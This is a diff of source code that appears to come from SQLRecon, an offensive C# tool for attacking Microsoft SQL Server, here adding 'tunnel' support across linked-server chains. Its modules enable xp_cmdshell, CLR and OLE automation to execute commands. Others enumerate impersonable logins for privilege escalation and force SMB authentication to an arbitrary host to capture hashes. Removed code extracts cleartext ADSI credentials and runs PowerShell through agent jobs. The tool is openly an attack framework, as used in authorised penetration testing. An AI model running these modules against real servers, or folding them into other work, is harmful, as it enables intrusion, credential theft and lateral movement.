-            _print.Status(string.Format("Disabling RPC on {0}", _arg1), true);
-            _config.ModuleToggle(_connection, "rpc", "false", _arg1);
+            _print.Status($"Disabling RPC on {contextDescription}", true);
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _config.TunnelModuleToggle(_connection, "rpc", "false", _tunnelSqlServer, _sqlServer);
+            }
+            else
+            {
+                _config.ModuleToggle(_connection, "rpc", "false", _arg1);
+            }
         }
 
         /// <summary>
-        /// The disablexp method is used against single instances of SQL server to
+        /// The disablexp method is used against single instances or tunneled SQL servers to
         /// disable xp_cmdshell.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void disablexp()
         {
-            _print.Status(string.Format("Disabling xp_cmdshell on {0}", _sqlServer), true);
-            _config.ModuleToggle(_connection, "xp_cmdshell", "0", _sqlServer);
+            _print.Status($"Disabling xp_cmdshell on {contextDescription}", true);
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _config.TunnelModuleToggle(_connection, "xp_cmdshell", "0", _tunnelSqlServer, _sqlServer);
+            }
+            else
+            {
+                _config.ModuleToggle(_connection, "xp_cmdshell", "0", _sqlServer);
+            }
         }
 
         /// <summary>
-        /// The enableclr method is used against single instances of SQL server to
+        /// The enableclr method is used against single instances or tunneled SQL servers to
         /// enable CLR integration.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void enableclr()
         {
-            _print.Status(string.Format("Enabling CLR integration on {0}", _sqlServer), true);
-            _config.ModuleToggle(_connection, "clr enabled", "1", _sqlServer);
+            _print.Status($"Enabling CLR integration on {contextDescription}", true);
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _config.TunnelModuleToggle(_connection, "clr enabled", "1", _tunnelSqlServer, _sqlServer);
+            }
+            else
+            {
+                _config.ModuleToggle(_connection, "clr enabled", "1", _sqlServer);
+            }
         }
 
         /// <summary>
-        /// The enableole method is used against single instances of SQL server to
+        /// The enableole method is used against single instances or tunneled SQL servers to
         /// enable OLE automation.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void enableole()
         {
-            _print.Status(string.Format("Enabling Ole Automation Procedures on {0}", _sqlServer), true);
-            _config.ModuleToggle(_connection, "Ole Automation Procedures", "1", _sqlServer);
+            _print.Status($"Enabling Ole Automation Procedures on {contextDescription}", true);
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _config.TunnelModuleToggle(_connection, "Ole Automation Procedures", "1", _tunnelSqlServer, _sqlServer);
+            }
+            else
+            {
+                _config.ModuleToggle(_connection, "Ole Automation Procedures", "1", _sqlServer);
+            }
         }
 
-        /// <summary>
-        /// The enablerpc method is used against the initial SQL server to
-        /// enable 'rpc out' on a specified SQL server.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void enablerpc()
-        {
-            _print.Status(string.Format("Enabling RPC on {0}", _arg1), true);
-            _config.ModuleToggle(_connection, "rpc", "true", _arg1);
-        }
 
         /// <summary>
-        /// The enablexp method is used against single instances of SQL server to
-        /// enable xp_cmdshell.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// The enablexp method is used to enable xp_cmdshell.
+        /// This method dynamically adjusts based on the connection type (single instance or tunneled).
+        /// </summary>
         public static void enablexp()
         {
-            _print.Status(string.Format("Enabling xp_cmdshell on {0}", _sqlServer), true);
-            _config.ModuleToggle(_connection, "xp_cmdshell", "1", _sqlServer);
+            _print.Status($"Enabling xp_cmdshell on {contextDescription}", true);
+
+            // Determine the context and execute the appropriate method
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _config.TunnelModuleToggle(_connection, "xp_cmdshell", "1", _tunnelSqlServer, _sqlServer);
+            }
+            else
+            {
+                _config.ModuleToggle(_connection, "xp_cmdshell", "1", _sqlServer);
+            }
         }
 
+
+
         /// <summary>
-        /// The impersonate method is used against single instances of SQL server to
-        /// identify if any SQL accounts can be impersonated. This method is particularly
-        /// crucial for understanding potential privilege escalation paths.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
+        /// The impersonate method is used to identify if any SQL accounts can be impersonated.
+        /// This method is crucial for understanding potential privilege escalation paths.
+        /// It dynamically adjusts based on the connection type (single instance or tunneled).
         /// </summary>
         public static void impersonate()
         {
-            _print.Status($"Enumerating accounts that can be impersonated on {_sqlServer}", true);
+            _print.Status($"Enumerating accounts that can be impersonated on {contextDescription}", true);
 
             // Check if the current user is a sysadmin
             string sysAdminCheckQuery = "SELECT IS_SRVROLEMEMBER('sysadmin');";
-            string isSysAdmin = _sqlQuery.ExecuteCustomQuery(_connection, sysAdminCheckQuery).Trim();
+            string isSysAdmin = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, sysAdminCheckQuery).Trim()
+                : _sqlQuery.ExecuteCustomQuery(_connection, sysAdminCheckQuery).Trim();
 
             var allLoginsQuery = "SELECT name FROM sys.server_principals WHERE type_desc IN ('SQL_LOGIN', 'WINDOWS_LOGIN') AND name NOT LIKE '##%';";
-            var allLogins = _sqlQuery.ExecuteCustomQuery(_connection, allLoginsQuery);
+            var allLogins = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, allLoginsQuery)
+                : _sqlQuery.ExecuteCustomQuery(_connection, allLoginsQuery);
 
             var logins = _sqlQuery.ExtractColumnValues(allLogins, "name");
 
@@ -324,7 +462,11 @@ namespace SQLRecon.Commands
                 {
                     foreach (var login in logins)
                     {
-                        if (_sqlQuery.CanImpersonate(_connection, login))
+                        bool canImpersonate = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                            ? _sqlQuery.CanImpersonateTunnel(_connection, login, _tunnelSqlServer)
+                            : _sqlQuery.CanImpersonate(_connection, login);
+
+                        if (canImpersonate)
                         {
                             impersonables.Add(login);
                         }
@@ -347,322 +489,210 @@ namespace SQLRecon.Commands
         }
 
 
-        /// <summary>
-        /// The info method is used against single instances of SQL server to
-        /// gather information about the remote SQL server instance.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void info()
-        {
-            _print.Status(string.Format("Extracting SQL Server information from {0}", _sqlServer), true);
-            var Info = new SqlServerInfo(_connection);
-            Info.GetAllSQLServerInfo();
-            Info.PrintInfo();
-        }
 
         /// <summary>
-        /// The links method is used against single instances of SQL server to
-        /// determine if the remote SQL server has a link configured to other SQL servers.
+        /// The links method is used to determine if the SQL server has a link configured to other SQL servers.
         /// It provides detailed information about each linked server, including the local login mapping,
         /// whether self-mapping is used, the remote login, and other linked server properties.
+        /// This method dynamically adjusts based on the connection type (single instance or tunneled).
         /// </summary>
         public static void links()
         {
-            _print.Status($"Additional SQL links and login mappings on {_sqlServer}", true);
+            _print.Status($"Additional SQL links and login mappings on {contextDescription}", true);
 
             // Query to fetch detailed linked server information along with login mappings
             _query = @"
-        SELECT
-            srv.name AS [Linked Server],
-            srv.product,
-            srv.provider,
-            srv.data_source,
-            COALESCE(prin.name, 'N/A') AS [Local Login],
-            ll.uses_self_credential AS [Is Self Mapping],
-            ll.remote_name AS [Remote Login]
-        FROM
-            sys.servers srv
-            LEFT JOIN sys.linked_logins ll ON srv.server_id = ll.server_id
-            LEFT JOIN sys.server_principals prin ON ll.local_principal_id = prin.principal_id
-        WHERE
-            srv.is_linked = 1;";
+                SELECT
+                    srv.name AS [Linked Server],
+                    srv.product,
+                    srv.provider,
+                    srv.data_source,
+                    COALESCE(prin.name, 'N/A') AS [Local Login],
+                    ll.uses_self_credential AS [Is Self Mapping],
+                    ll.remote_name AS [Remote Login]
+                FROM
+                    sys.servers srv
+                    LEFT JOIN sys.linked_logins ll ON srv.server_id = ll.server_id
+                    LEFT JOIN sys.server_principals prin ON ll.local_principal_id = prin.principal_id
+                WHERE
+                    srv.is_linked = 1;";
 
-            // Execute the query and check if the output is empty
-            string result = _sqlQuery.ExecuteCustomQuery(_connection, _query);
+            // Execute the query based on connection type
+            string result = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, _query)
+                : _sqlQuery.ExecuteCustomQuery(_connection, _query);
+
+            // Check if the output is empty and print the result
             _print.IsOutputEmpty(result, true);
         }
 
-
         /// <summary>
-        /// The olecmd method is used against single instances of SQL server to
-        /// execute a user supplied command.
+        /// The olecmd method is used to execute a user-supplied command via OLE Automation Procedures.
+        /// This method dynamically adjusts based on the connection type (single instance or tunneled).
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void olecmd()
         {
-            _print.Status(string.Format("Executing '{0}' on {1}", _arg1, _sqlServer), true);
-            _ole.Standard(_connection, _arg1);
+            _print.Status($"Executing '{_arg1}' on {contextDescription}", true);
+
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _ole.Tunnel(_connection, _arg1, _tunnelSqlServer, _sqlServer);
+            }
+            else
+            {
+                _ole.Standard(_connection, _arg1);
+            }
         }
 
+
         /// <summary>
-        /// The query method is used against single instances of SQL server to
+        /// The query method is used against single instances or tunneled instances of SQL server to
         /// execute a user supplied SQL query.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void query()
         {
-            _print.Status(string.Format("Executing '{0}' on {1}", _arg1, _sqlServer), true);
-            _print.IsOutputEmpty(_sqlQuery.ExecuteCustomQuery(_connection, _arg1), true);
+            _print.Status($"Executing '{_arg1}' on {contextDescription}", true);
+
+            // Execute the query based on connection type
+            string result = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, _arg1)
+                : _sqlQuery.ExecuteCustomQuery(_connection, _arg1);
+
+            _print.IsOutputEmpty(result, true);
         }
 
         /// <summary>
-        /// The rows method is used against single instances of SQL server to
-        /// determine the number of ` in a table.
+        /// The rows method is used against single instances or tunneled instances of SQL server to
+        /// determine the number of rows in a table.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
         /// </summary>
         public static void rows()
         {
-            _print.Status(string.Format("Displaying number of rows from table '{1}' in '{0}' on {2}",
-                _arg1, _arg2, _sqlServer), true);
+            _print.Status($"Displaying number of rows from table '{_arg2}' in '{_arg1}' on {contextDescription}", true);
 
-            _query = "use " + _arg1 + ";" +
-                "SELECT COUNT(*) as row_count FROM " + _arg2 + ";";
-            _print.IsOutputEmpty(_sqlQuery.ExecuteCustomQuery(_connection, _query), true);
+            _query = $"USE {_arg1}; SELECT COUNT(*) as row_count FROM {_arg2};";
+
+            // Execute the query based on connection type and print the result
+            string result = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, _query)
+                : _sqlQuery.ExecuteCustomQuery(_connection, _query);
+
+            _print.IsOutputEmpty(result, true);
         }
 
+
+
         /// <summary>
-        /// The search method is used against single instances of SQL server to
+        /// The search method is used against single instances or tunneled instances of SQL server to
         /// search a table for a specific column name.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void search()
         {
-            _print.Status(string.Format("Searching for columns containing '{0}' in '{1}' on {2}",
-                _arg1, _database, _sqlServer), true);
+            _print.Status($"Searching for columns containing '{_arg1}' in '{_database}' on {contextDescription}", true);
 
+            // Define the query to search for columns
             _query = "SELECT table_name, column_name " +
-                "FROM INFORMATION_SCHEMA.COLUMNS WHERE column_name LIKE '%" + _arg1 + "%';";
+                    "FROM INFORMATION_SCHEMA.COLUMNS WHERE column_name LIKE '%" + _arg1 + "%';";
 
-            _print.IsOutputEmpty(_sqlQuery.ExecuteCustomQuery(_connection, _query), true);
+            // Execute the query based on connection type and print the result
+            string result = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, _query)
+                : _sqlQuery.ExecuteCustomQuery(_connection, _query);
+
+            _print.IsOutputEmpty(result, true);
         }
 
         /// <summary>
-        /// The smb method is used against single instances of SQL server to
+        /// The smb method is used against single instances or tunneled SQL servers to
         /// make the SQL server solicit a SMB request to an arbitrary host.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void smb()
         {
-            CaptureHash _ = new(_connection, _arg1);
-            _print.Status(string.Format("Sent SMB Request to {0}", _arg1), true);
+            _print.Status($"Sending SMB Request to {_arg1} from {contextDescription}", true);
+
+            new CaptureHash(_connection, _arg1, _tunnelSqlServer != null && _tunnelSqlServer.Length > 0 ? _tunnelSqlServer : null);
+
+            _print.Success($"SMB Request sent from {(contextDescription)} to {_arg1}.", true);
         }
 
+
         /// <summary>
-        /// The tables method is used against single instances of SQL server to
-        /// retrieve the tables from the user supplied database.
+        /// The tables method is used against single instances of SQL server or
+        /// tunneled instances to retrieve the tables from the user supplied database.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void tables()
         {
-            _print.Status(string.Format("Tables in {0}", _arg1), true);
-            _query = "SELECT * FROM " + _arg1 + ".INFORMATION_SCHEMA.TABLES;";
-            _print.IsOutputEmpty(_sqlQuery.ExecuteCustomQuery(_connection, _query), true);
+            _print.Status($"Tables in {_arg1} on {contextDescription}", true);
+
+            // Construct the query to retrieve tables
+            _query = $"SELECT * FROM {_arg1}.INFORMATION_SCHEMA.TABLES;";
+
+            // Execute the query based on connection type
+            string result = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, _query)
+                : _sqlQuery.ExecuteCustomQuery(_connection, _query);
+
+            // Check if the output is empty and print the result
+            _print.IsOutputEmpty(result, true);
         }
 
 
-
         /// <summary>
-        /// The xpcmd method is used against single instances of SQL server to
-        /// execute a user supplied command.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// The xpcmd method dynamically determines the context (single, linked, tunneled)
+        /// and executes the command using xp_cmdshell.
+        /// </summary>
         public static void xpcmd()
         {
-            _print.Status(string.Format("Executing '{0}' on {1}", _arg1, _sqlServer), true);
+            _print.Status($"Executing '{_arg1}' on {contextDescription}", true);
+
+            // Determine the context and execute the appropriate method
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _xpCmdShell.Tunnel(_connection, _arg1, _tunnelSqlServer);
+                return;
+            }
             _xpCmdShell.Standard(_connection, _arg1);
         }
 
 
 
         /// <summary>
-        /// The iwhoami method is used in conjunction with an account that can be
-        /// impersonated to determine the current users level of access.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void iwhoami()
-        {
-            DetermineUserPermissions(
-                _connection,
-                _sqlServer,
-                impersonate: _impersonate);
-        }
-
-        /// <summary>
-        /// The whoami method is used against single instances of SQL server to
-        /// determine the current users level of access.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
+        /// The whoami method dynamically determines the current user's level of access
+        /// based on the presence of _impersonate or _tunnelSqlServer.
         /// </summary>
         public static void whoami()
         {
-            DetermineUserPermissions(
-                _connection,
-                _sqlServer);
-        }
-
-        /// <summary>
-        /// The lwhoami method is used against linked SQL servers to
-        /// determine the current users level of access.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void lwhoami()
-        {
-            DetermineUserPermissions(
-                _connection,
-                _sqlServer,
-                linkedSqlServer: _linkedSqlServer);
-        }
-
-        /// <summary>
-        /// The twhoami method is used against a chain of linked SQL servers to
-        /// determine the current users level of access.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void twhoami()
-        {
-            DetermineUserPermissions(
-                _connection,
-                _sqlServer,
-                tunnelSqlServers: _tunnelSqlServer);
-        }
-
-        // users
-
-        /// <summary>
-        /// The users method is used against single instances of SQL server to
-        /// obtain local users in the SQL instance.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void users()
-        {
-            string contextDescription = $"{_database} database on {_sqlServer}";
-
-            RetrieveUsers(_connection, contextDescription);
-        }
-
-        /// <summary>
-        /// The iusers method is used in conjunction with an account that can be
-        /// impersonated to obtain local users in the SQL instance.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void iusers()
-        {
-            string contextDescription = $"{_database} database on {_sqlServer} as '{_impersonate}'";
-            RetrieveUsers(_connection, contextDescription, _impersonate);
-        }
-
-        /// <summary>
-        /// The lusers method is used against linked SQL servers to
-        /// obtain local users in the SQL instance.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void lusers()
-        {
-            string contextDescription = $"{_database} database on {_linkedSqlServer} via {_sqlServer}";
-            RetrieveUsers(_connection, contextDescription, linkedSqlServer: _linkedSqlServer);
-        }
-
-        /// <summary>
-        /// The tusers method is used against a chain of linked SQL servers to
-        /// obtain local users in the SQL instance.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void tusers()
-        {
-            string contextDescription = $"{_database} database from tunnel {_tunnelPath}";
-            RetrieveUsers(_connection, contextDescription, tunnelSqlServers: _tunnelSqlServer);
-        }
-
-
-        /*
-         * *****************************************************************
-         * *****************************************************************
-         * *****************************************************************
-         * ************************ Main Methods  **************************
-         * *****************************************************************
-         * *****************************************************************
-         * *****************************************************************
-         */
-
-        // That is the whoami
-        private static void DetermineUserPermissions(
-            SqlConnection connection,
-            string sqlServer,
-            string linkedSqlServer = null,
-            string impersonate = null,
-            string[] tunnelSqlServers = null)
-        {
             string query;
-            string contextDescription = sqlServer;
-
-            if (impersonate != null)
-            {
-                contextDescription += $" as '{impersonate}'";
-            }
-            else if (linkedSqlServer != null)
-            {
-                contextDescription += $" via {linkedSqlServer}";
-            }
-            else if (tunnelSqlServers != null)
-            {
-                contextDescription += $" via tunnel {string.Join(" -> ", tunnelSqlServers)}";
-            }
 
             _print.Status($"Determining user permissions on {contextDescription}", true);
 
             query = "SELECT SYSTEM_USER;";
-            string loggedInUser = (impersonate, linkedSqlServer, tunnelSqlServers) switch
-            {
-                (not null, _, _) => _sqlQuery.ExecuteImpersonationQuery(connection, impersonate, query),
-                (_, not null, _) => _sqlQuery.ExecuteLinkedQuery(connection, linkedSqlServer, query),
-                (_, _, not null) => _sqlQuery.ExecuteTunnelQuery(connection, tunnelSqlServers, query),
-                _ => _sqlQuery.ExecuteQuery(connection, query)
-            };
+            string loggedInUser = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelQuery(_connection, _tunnelSqlServer, query)
+                : _sqlQuery.ExecuteQuery(_connection, query);
             _print.Success($"Logged in as {loggedInUser}", true);
 
             query = "SELECT USER_NAME();";
-            string mappedUser = (impersonate, linkedSqlServer, tunnelSqlServers) switch
-            {
-                (not null, _, _) => _sqlQuery.ExecuteImpersonationQuery(connection, impersonate, query),
-                (_, not null, _) => _sqlQuery.ExecuteLinkedQuery(connection, linkedSqlServer, query),
-                (_, _, not null) => _sqlQuery.ExecuteTunnelQuery(connection, tunnelSqlServers, query),
-                _ => _sqlQuery.ExecuteQuery(connection, query)
-            };
+            string mappedUser = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelQuery(_connection, _tunnelSqlServer, query)
+                : _sqlQuery.ExecuteQuery(_connection, query);
             _print.Success($"Mapped to the user {mappedUser}", true);
 
             query = "SELECT [name] FROM sysusers WHERE issqlrole = 1;";
-            string getRoles = (impersonate, linkedSqlServer, tunnelSqlServers) switch
-            {
-                (not null, _, _) => _sqlQuery.ExecuteImpersonationCustomQuery(connection, impersonate, query),
-                (_, not null, _) => _sqlQuery.ExecuteLinkedCustomQuery(connection, linkedSqlServer, query),
-                (_, _, not null) => _sqlQuery.ExecuteTunnelCustomQuery(connection, tunnelSqlServers, query),
-                _ => _sqlQuery.ExecuteCustomQuery(connection, query)
-            };
+            string getRoles = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, query)
+                : _sqlQuery.ExecuteCustomQuery(_connection, query);
 
             List<string> rolesList = _sqlQuery.ExtractColumnValues(getRoles, "name");
 
@@ -676,13 +706,9 @@ namespace SQLRecon.Commands
 
             foreach (var item in combinedRoles)
             {
-                bool isMember = (impersonate, linkedSqlServer, tunnelSqlServers) switch
-                {
-                    (not null, _, _) => _roles.CheckImpersonatedRole(connection, item.Trim(), impersonate, false),
-                    (_, not null, _) => _roles.CheckLinkedServerRole(connection, item.Trim(), linkedSqlServer, false),
-                    (_, _, not null) => _roles.CheckTunnelServerRole(connection, item.Trim(), tunnelSqlServers, false),
-                    _ => _roles.CheckServerRole(connection, item.Trim(), false)
-                };
+                bool isMember = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                    ? _roles.CheckTunnelServerRole(_connection, item.Trim(), _tunnelSqlServer, false)
+                    : _roles.CheckServerRole(_connection, item.Trim(), false);
 
                 if (isMember)
                 {
@@ -694,26 +720,38 @@ namespace SQLRecon.Commands
                 }
             }
 
-            _print.Success("User is a member of roles below:", true);
-            foreach (var role in memberRoles)
+            if (memberRoles.Any())
             {
-                _print.Nested(role, true);
+                _print.Success("User is a member of roles below:", true);
+                foreach (var role in memberRoles)
+                {
+                    _print.Nested(role, true);
+                }
+            }
+            else
+            {
+                _print.Error("User is NOT a member of any roles.", true);
             }
 
-            _print.Error("User is NOT a member of roles below:", true);
-            foreach (var role in nonMemberRoles)
+            if (nonMemberRoles.Any())
             {
-                _print.Nested(role, true);
+                _print.Error("User is NOT a member of roles below:", true);
+                foreach (var role in nonMemberRoles)
+                {
+                    _print.Nested(role, true);
+                }
             }
         }
 
-        // That is the users
-        private static void RetrieveUsers(
-            SqlConnection connection,
-            string contextDescription,
-            string impersonate = null,
-            string linkedSqlServer = null,
-            string[] tunnelSqlServers = null)
+
+       /// <summary>
+        /// The users method is used to obtain local users in the SQL instance.
+        /// It adjusts dynamically based on whether the SQL server is a single instance,
+        /// or part of a tunnel chain.
+        /// This method needs to be public as reflection is used to match the
+        /// module name that is supplied via command line, to the actual method name.
+        /// </summary>
+        public static void users()
         {
             string dbQuery = "SELECT name AS username, create_date, modify_date, type_desc AS type, " +
                             "authentication_type_desc AS authentication_type " +
@@ -726,845 +764,26 @@ namespace SQLRecon.Commands
                                 "WHERE name NOT LIKE '##%' " +
                                 "ORDER BY modify_date DESC;";
 
-            string dbUsers = (impersonate, linkedSqlServer, tunnelSqlServers) switch
-            {
-                (not null, _, _) => _sqlQuery.ExecuteImpersonationCustomQuery(connection, impersonate, dbQuery),
-                (_, not null, _) => _sqlQuery.ExecuteLinkedCustomQuery(connection, linkedSqlServer, dbQuery),
-                (_, _, not null) => _sqlQuery.ExecuteTunnelCustomQuery(connection, tunnelSqlServers, dbQuery),
-                _ => _sqlQuery.ExecuteCustomQuery(connection, dbQuery)
-            };
+            // Context description adjusts based on connection type
+            string contextDescription = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? $"{_database} database from tunnel {_tunnelPath}"
+                : $"{_database} database on {_sqlServer}";
 
-            string serverUsers = (impersonate, linkedSqlServer, tunnelSqlServers) switch
-            {
-                (not null, _, _) => _sqlQuery.ExecuteImpersonationCustomQuery(connection, impersonate, serverQuery),
-                (_, not null, _) => _sqlQuery.ExecuteLinkedCustomQuery(connection, linkedSqlServer, serverQuery),
-                (_, _, not null) => _sqlQuery.ExecuteTunnelCustomQuery(connection, tunnelSqlServers, serverQuery),
-                _ => _sqlQuery.ExecuteCustomQuery(connection, serverQuery)
-            };
+            // Execute queries based on connection type
+            string dbUsers = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, dbQuery)
+                : _sqlQuery.ExecuteCustomQuery(_connection, dbQuery);
 
-            _print.Status($"Users in the '{contextDescription}':", true);
+            string serverUsers = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
+                ? _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, serverQuery)
+                : _sqlQuery.ExecuteCustomQuery(_connection, serverQuery);
+
+            // Print user details
+            _print.Status($"Users in the {contextDescription}:", true);
             _print.Nested("Database Principals:", true);
             Console.WriteLine(dbUsers);
             _print.Nested("Server Principals:", true);
             Console.WriteLine(serverUsers);
-        }
-
-
-
-        /*
-         * *****************************************************************
-         * *****************************************************************
-         * *****************************************************************
-         * ******************* Linked SQL Server Modules *******************
-         * *****************************************************************
-         * *****************************************************************
-         * *****************************************************************
-         */
-
-        /// <summary>
-        /// The ladsi method is used against linked SQL servers to
-        /// obtain cleartext ADSI credentials.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void ladsi()
-        {
-            _print.Status(string.Format("Obtaining ADSI credentials for '{1}' on {2} via {1}",
-                _sqlServer, _arg1, _linkedSqlServer), true);
-            _adsi.Linked(_connection, _arg1, _arg2, _linkedSqlServer, _sqlServer);
-        }
-
-        /// <summary>
-        /// The lagentcmd method is used against linked SQL servers to
-        /// execute commands via agent jobs using PowerShell.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lagentcmd()
-        {
-            _print.Status(string.Format("Executing '{0}' using PowerShell on {1} via {2}",
-                _arg1, _linkedSqlServer, _sqlServer), true);
-            _agentJobs.Linked(_connection, _linkedSqlServer, "PowerShell", _arg1, _sqlServer);
-        }
-
-        /// <summary>
-        /// The lagentstatus method is used against linked SQL servers to
-        /// check to see if SQL server agent is running.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lagentstatus()
-        {
-            _print.Status(string.Format("Getting SQL agent status on {0} via {1}",
-                _linkedSqlServer, _sqlServer), true);
-            _agentJobs.GetLinkedAgentStatusAndJobs(_connection, _linkedSqlServer);
-        }
-
-        /// <summary>
-        /// The lcheckrpc method is used against linked SQL servers to
-        /// to identify what systems linked off the linked SQL server can have RPC enabled.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lcheckrpc()
-        {
-            _print.Status(string.Format("The following SQL servers can have RPC configured on {0} via {1}"
-                , _linkedSqlServer, _sqlServer), true);
-
-            _query = "SELECT name, is_rpc_out_enabled FROM sys.servers";
-
-            _print.IsOutputEmpty(_sqlQuery.ExecuteLinkedCustomQuery(
-                _connection, _linkedSqlServer, _query), true);
-        }
-
-        /// <summary>
-        /// The lcolumns method is used against linked SQL servers to
-        /// to list the columns for a table in a database.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void lcolumns()
-        {
-            // First check to see if rpc is enabled.
-            _query = _config.ModuleStatus(_connection, "rpc", "null", _linkedSqlServer);
-            if (!_query.Contains("1"))
-            {
-                _print.Error(string.Format("You need to enable RPC for {1} on {0} (enablerpc -o {1}).",
-                   _sqlServer, _linkedSqlServer), true);
-                // Go no futher.
-                return;
-            }
-
-            _print.Status(string.Format("Displaying columns from '{1}' in '{0}' on {2} via {3}",
-                _arg1, _arg2, _linkedSqlServer, _sqlServer), true);
-
-            _query = "use " + _arg1 + ";" +
-               "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS " +
-               "WHERE TABLE_NAME = ''" + _arg2 + "'' ORDER BY ORDINAL_POSITION;";
-
-            _print.IsOutputEmpty(_sqlQuery.ExecuteLinkedCustomQueryRpcExec(
-                _connection, _linkedSqlServer, _query), true);
-        }
-
-        /// <summary>
-        /// The lclr method is used against linked SQL servers to execute custom .NET CLR assemblies.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lclr()
-        {
-            _print.Status(string.Format("Performing CLR custom assembly attack on {0} via {1}",
-                _linkedSqlServer, _sqlServer), true);
-            _clr.Linked(_connection, _arg1, _arg2, _linkedSqlServer, _sqlServer);
-        }
-
-        /// <summary>
-        /// The ldatabases method is used against linked SQL servers to
-        /// show all configured databases.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void ldatabases()
-        {
-            _print.Status(string.Format("Databases on {0} via {1}", _linkedSqlServer, _sqlServer), true);
-            _query = "SELECT dbid, name, crdate, filename FROM master.dbo.sysdatabases;";
-            Console.WriteLine(_sqlQuery.ExecuteLinkedCustomQuery(_connection, _linkedSqlServer, _query));
-        }
-
-        /// <summary>
-        /// The ldisableclr method is used against linked SQL servers to
